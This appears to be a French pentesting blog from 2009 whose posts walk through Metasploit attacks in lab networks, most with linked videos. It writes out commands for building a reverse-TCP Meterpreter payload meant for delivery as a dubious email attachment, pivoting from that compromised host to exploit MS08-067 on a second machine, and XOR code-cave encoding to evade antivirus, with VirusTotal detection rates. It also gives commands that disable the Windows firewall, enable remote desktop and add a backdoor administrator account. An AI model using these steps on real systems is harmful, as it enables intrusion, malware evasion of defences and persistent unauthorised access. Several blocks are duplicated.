multiexploit from ne0matrix on Vimeo.
dimanche 14 juin 2009
samedi 13 juin 2009
Meterpreter attack pivot [video]
meterpreter - portfwd from ne0matrix on Vimeo.
----------------------------------------------
network 1 (wifi)
R1: xx.xx.xx.xx (public IP)
NAT overload + static PAT (53, 69, 4444, 4445)
A: Laptop BT 192.168.1.8 (attacker)
----------------------------------------------
network 2
R2: NAT overload (firewall)
B: Desktop XPsp2 192.168.1.67 (target1 - pivot)
C: Laptop XPsp3 192.168.1.66 (target2)
----------------------------------------------
A ==wifi==> * R1 * ---internet--> * R2 * ==wire==> + B + ==wire==> C
----------------------------------------------
----------------------------------------------
ATTAQUE 1 (B)
Envoi par email(par ex) d'un fichier douteux (.doc-macrovba, .pdf, .jpg, etc....) qui éxécute un payload reverse tcp.
msfpayload windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 X > reverse.exe
#pour la démonstration, on a transféré le fichier via tftp
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 4444
exploit
#B éxécute reverse.exe ==> 1ere séssion meterpreter
#pour la démonstration, on a transféré le fichier via tftp
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.8
set LPORT 4444
exploit
#B éxécute reverse.exe ==> 1ere séssion meterpreter
----------------------------------------------
CONFIGURATION PIVOT sur B
portfwd add -L 127.0.0.1 -l 4445 -r 192.168.1.66 -p 445
background
route add 192.168.1.66 255.255.255.255 1
#1 étant le numéro de la séssion
background
route add 192.168.1.66 255.255.255.255 1
#1 étant le numéro de la séssion
----------------------------------------------
ATTAQUE 2 (C)
use windows/smb/ms08_067_netapi
set RHOST 192.168.1.66
set RPORT 445
set payload windows/meterpreter/bind_tcp
set LPORT 4445
exploit
#2e séssion meterpreter
set RHOST 192.168.1.66
set RPORT 445
set payload windows/meterpreter/bind_tcp
set LPORT 4445
exploit
#2e séssion meterpreter
vendredi 12 juin 2009
Execution flow hijack + XOR encryption
Execution flow hijack + XOR from ne0matrix on Vimeo.
***Based on the shmoocon demo made by Muts***
Backtrack:
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe
Windows:
Click on the file ==> bindshell on port 55555
check: netstat -na find "55555"
PEditor
.idata: vsize:500 - rsize:400
hexedit:
+ 200 hex bytes
--------------
--OLLYdbg--
--------------
first instructions:
00401000 > 31C0 XOR EAX,EAX
00401002 68 34104000 PUSH
00401007 . 64:FF30 PUSH DWORD PTR FS:[EAX]
0040100A . 64:8920 MOV DWORD PTR FS:[EAX],ESP
0040100D . 6A 40 PUSH 40
Code cave: 00401066
start: 00401002
end: 00401060
XOR loop:
MOV EAX, 00401002 # Start of encoding address.
XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5E
INC EAX # Increase EAX
CMP EAX, 00401060 # Tests to see if we've reached the end of our enc
JLE SHORT xxx # If not, jump back to XOR command
After the loop:
XOR EAX,EAX (overwritten instructions)
JMP 00401002 (the address after the overwritten instructions)
------------------
Commentaires
------------------
1- Créer un payload bind_tcp
msfpayload windows/shell_bind_tcp LPORT=55555 X > bindtcp.exe (par exemple)
2- Le scanner via virustotal (résultat...)
3- Cliquer sur le payload et vérifier que le port un ouvert
netstat -na find "55555"
4- Exécuter le payload dans PEditor
-Modifier la section .idata
vsize:500 & rsize:400
Elle doit être readable, writable et executable.
-Modifier la section .text (readable, Writable et executable)
Enregistrer
5- Ouvrir le payload avec Hexedit
-Ajouter 200 hex bytes
Puisque (initial-rsize=200, actual-rsize=400 ) 400-200 ==> 200.
Enregistrer
6- Lancer le payload via Ollydbg
-Copier les 1eres instructions dans notepad (pour repérer les instructions qui seront remplacées)
-Trouver un espace libre pour le "code-cave"
-Retouner à l'OEP(entrypoint/début), remplacer la 1ere instruction par "JMP adresse-du-code-cave"
-Définir/repérer l'adresse à laquelle doit commencer l'encodage
-Définir/repérer l'adresse à laquelle doit se terminer l'encodage, et modifier la boucle ASM avec ces adresses.
-Après la boucle, introduire l'instruction (les instructions) qui a été remplacée par le JMP du début.
-Et terminer par un 2e JMP vers l'adresse [00401002] qui suit l'instruction remplacée
jeudi 11 juin 2009
jeudi 21 mai 2009
samedi 16 mai 2009
Msfencode + Xor encoding ==> 15%
Fichier encodedbindtcpx.exe reçu le 2009.05.16 23:23:28 (CET)Situation actuelle: terminé
Résultat: 6/40 (15.00%)
http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482
Résultat: 6/40 (15.00%)
http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482
vendredi 15 mai 2009
msfencode vs XOR encryption
./msfpayload windows/shell_bind_tcp LPORT=55555 X > ***.exe
Fichier bindtcpx.exe reçu le 2009.05.15 20:33:46 (CET)
Situation actuelle: terminé
Résultat: 12/40 (30.00%)
http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49
--------------------------
Execution flow hijack ==> XOR encryption
Fichier bindtcpx1.exe reçu le 2009.05.15 20:35:25 (CET)
Situation actuelle: terminé
Résultat: 8/40 (20.00%)
http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231
--------------------------
./msfpayload windows/shell_bind_tcp LPORT=55555 R msfencode -b '' -t exe -o ***.exe
Fichier encodedbindtcp.exe reçu le 2009.05.16 23:33:49 (CET)Situation actuelle: terminé
Résultat: 10/40 (25.00%)
http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e
Fichier bindtcpx.exe reçu le 2009.05.15 20:33:46 (CET)
Situation actuelle: terminé
Résultat: 12/40 (30.00%)
http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49
--------------------------
Execution flow hijack ==> XOR encryption
Fichier bindtcpx1.exe reçu le 2009.05.15 20:35:25 (CET)
Situation actuelle: terminé
Résultat: 8/40 (20.00%)
http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231
--------------------------
./msfpayload windows/shell_bind_tcp LPORT=55555 R msfencode -b '' -t exe -o ***.exe
Fichier encodedbindtcp.exe reçu le 2009.05.16 23:33:49 (CET)Situation actuelle: terminé
Résultat: 10/40 (25.00%)
http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e
dimanche 3 mai 2009
Remote desktop configuration
getgui from ne0matrix on Vimeo.
Getgui script:
getgui.rb on metasploit
run getgui -h
manual config:
Netstat –na find “3389”
Netsh firewall show opmode
netsh firewall set opmode mode=DISABLE
netsh firewall set opmode exception=ENABLE
netsh firewall set service type = remotedesktop mode = enable
netsh firewall set service type = remotedesktop mode = enable scope=CUSTOM 192.168.1.64
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" find "fDenyTSConnections"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user morpheus thematrix /add
net localgroup "Utilisateurs de Bureau à distance" /add"
net localgroup Administrateurs morpheus /add
lundi 27 avril 2009
Metasploit daemon - msfd I
Utility that opens the Metasploit framework for remote access. Basically turns the framework on the local machine into a server for remote machines.
Location:
/pentest/exploit/framework3
Usage:
./msfd -a
Example:
./msfd -a 192.168.1.100 -d -p 4444
[*] Initializing msfd...
[*] Running msfd...
links:
https://wiki.remote-exploit.org/backtrack/wiki/msfd
http://trac.metasploit.com/browser/framework3/trunk/msfd
Metasploit daemon - msfd II
This plugin provides an msf daemon interface that spawns a listener on a
defined port (default 55554) and gives each connecting client its own
console interface. These consoles all share the same framework instance.
link:
http://trac.metasploit.com/browser/framework3/trunk/plugins/msfd.rb
dimanche 26 avril 2009
Favorite quotations
COURAGE is not the ability to be fearless, but the ability to act in spite of fear.
Better to fight for something than to live for nothing.
(Gen. G.S. Patton)
Better to fight for something than to live for nothing.
(Gen. G.S. Patton)
Inscription à :
Articles (Atom)